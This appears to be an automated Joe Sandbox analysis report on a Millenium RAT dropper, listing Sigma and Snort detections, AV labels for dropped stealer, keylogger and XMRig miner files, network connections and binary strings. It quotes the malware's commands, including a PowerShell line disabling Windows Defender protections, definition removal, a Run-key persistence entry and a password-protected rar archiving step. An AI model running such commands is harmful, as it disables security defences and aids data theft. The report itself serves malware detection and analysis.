Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ParentProcessId: 7924, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 4944, ProcessName: svchost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\ProgramData\svchost.exe, ProcessId: 5952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\??????????

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ParentProcessId: 7924, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 4944, ProcessName: svchost.exe

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7820, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *, ProcessId: 2816, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8064, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 8152, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ParentProcessId: 7924, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 4944, ProcessName: svchost.exe

Snort Signatures

ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	06/05/24-03:56:42.216265
SID:	2036289
Source Port:	61625
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

Sophos S4: Label: malware repository domain

Antivirus detection for dropped file

Source: C:\ProgramData\Microsoft\hacn.exe	Avira: detection malicious, Label: TR/Drop.Agent.flqmj
Source: C:\ProgramData\setup.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\ProgramData\main.exe	Avira: detection malicious, Label: TR/Spy.KeyLogger.kapbl
Source: C:\ProgramData\svchost.exe	Avira: detection malicious, Label: TR/PSW.Agent.lninx
Source: C:\ProgramData\Microsoft\based.exe	Avira: detection malicious, Label: HEUR/AGEN.1351111

Multi AV Scanner detection for domain / URL

Source: http://pesterbdd.com/images/Pester.png

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\Microsoft\based.exe	ReversingLabs: Detection: 51%
Source: C:\ProgramData\Microsoft\hacn.exe	ReversingLabs: Detection: 66%
Source: C:\ProgramData\main.exe	ReversingLabs: Detection: 83%
Source: C:\ProgramData\setup.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\svchost.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: TS-240605-Millenium1.exe	ReversingLabs: Detection: 27%
Source: TS-240605-Millenium1.exe	Virustotal: Detection: 36%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Microsoft\hacn.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\setup.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\main.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\svchost.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\based.exe	Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED

Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49851 version: TLS 1.2

Source: TS-240605-Millenium1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: main.exe, 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: based.exe, 00000008.00000002.2129872037.00007FFDFAAD9000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2140810158.00007FFE13261000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000006.00000003.1866460732.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1907228986.00007FFE13311000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2141209052.00007FFE13301000.00000040.00000001.01000000.0000001E.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139839021.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp, svchost.exe, 00000016.00000003.1920172222.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139424502.00007FFE10301000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000005.00000000.1842954166.0000000000396000.00000002.00000001.01000000.00000007.sdmp, Build.exe, 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmp, s.exe, 0000000C.00000002.1929749777.0000000000D13000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000C.00000000.1890528447.0000000000D13000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2134327409.00007FFDFBAC0000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 00000016.00000003.1963958439.000002C3F5832000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: based.exe, based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140577670.00007FFE13201000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000016.00000003.1930006938.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: based.exe
